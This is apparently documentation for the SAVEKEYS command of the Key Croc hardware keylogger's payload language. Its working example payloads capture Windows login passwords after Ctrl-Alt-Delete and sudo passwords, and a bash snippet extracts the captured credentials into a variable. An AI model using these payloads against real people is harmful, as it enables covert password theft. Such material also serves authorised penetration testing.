The SAVEKEYS Command
SAVEKEYS allows the payload to save specific keys typed by the target when the payload has executed with a valid MATCH. SAVEKEYS can either save the LAST keys typed before a MATCH, or the NEXT keys typed after a MATCH.SAVEKEYS /absolute/path/to/file.log [NEXT | LAST | UNTIL] N (Number of keys)
Here's a brief example of using
SAVEKEYS with NEXT:MATCH hello
SAVEKEYS /root/loot/test.log NEXT 6
Imagine the target were to type "hello world". These 11 keys (the 10 characters and 1 spacebar key press) would be saved to the keylog files. As soon as the 5th key was pressed, completing the string "hello", the above example payload would execute based on the first line
MATCH statement. The second line of the payload would then instruct the framework to save the next 6 keypresses to a test.log file in /root/loot/.In this case when the target types "hello world" the payload executes, creating a new file in
/root/loot/test.log containing " world".In addition to saving a specified number of keys to save with the
NEXT parameter, SAVKEYS also features a UNTIL function (added in 1.3) which will save up to 255 keys UNTIL the specified key (regex value) is pressed.MATCH \[CONTROL-ALT-DELETE\]
SAVEKEYS /root/loot/windows-pass.txt UNTIL \[ENTER\]
In this example, the payload begins recording keystrokes to the
pass.txt file when the CONTROL-ALT-DELETE keyboard combination is pressed, and continues to record until the ENTER key is pressed.Note the escape characters before
[ and ] in these regular expressions. MATCH sudo(.*?)\[ENTER\]
SAVEKEYS /root/loot/sudo-pass.txt UNTIL \[ENTER\]
In addition to saving the next keys typed after a
MATCH, the SAVEKEYS command may be used to save the LAST keys typed before a MATCH.To recycle our
SAVEKEYS NEXT example above, we could modify with the following:MATCH world
SAVEKEYS /root/loot/test.log LAST 7
In this case when the target types "hello world" the payload gets executed on the 11th keypress, when the
MATCH "world" were completed, and the previously typed 7 keys would be saved to the /root/loot/test.log file. This would result in a log file containing "hello ".A maximum of 128 keys may be stored with
SAVEKEYS either NEXT or LAST.SAVEKEYS requires an absolute path for the output file. It cannot take a variable.SAVEKEYS /tmp/keys.txt LAST 10– correct usageSAVEKEYS $keyfile LAST 10– incorrect usage
If
SAVEKEYS is to be used in a payload, it must immediately follow a MATCH command.MATCH hello
SAVEKEYS /root/loot/text.log NEXT 6
LED ATTACK
MATCH hello
LED ATTACK
SAVEKEYS /root/loot/test.log NEXT 6
Keys of interest saved with
SAVEKEYS may be extracted systematically using text processing tools and used later as variables in a payload. It is important to note a payload will need to wait until the keys are saved – so pay special attention to the while command. For example:# Save the next 30 keys typed after the CTRL-ALT-DELETE key combo is pressed
MATCH \[CTRL-ALT-DELETE]
SAVEKEYS /tmp/login NEXT 30
# Wait until the login file is written (30 keys are pressed)
while [ ! -f /tmp/login ]; do sleep 2; done
# Define variable of keys typed before ENTER, removing any TAB keys
CREDS=$(cat /tmp/login | sed 's/\[TAB\]//g' | awk -F'\[ENTER\]' '{print $1}')
Similar to
MATCH, one should consider that SAVEKEYS is not actually a bash command but rather a Key Croc command which is interpreted by the Payload Framework. Changes to the SAVEKEYS command requires a reboot or issuing the RELOAD_PAYLOADS command. Additionally, the CHECK_PAYLOADS command will check the syntax and display the payload which will execute after the corresponding MATCH is typed by the target.Do not use the word "
SAVEKEYS" in a payload's comment as doing so will cause interpretation issues with the Key Croc payload parser.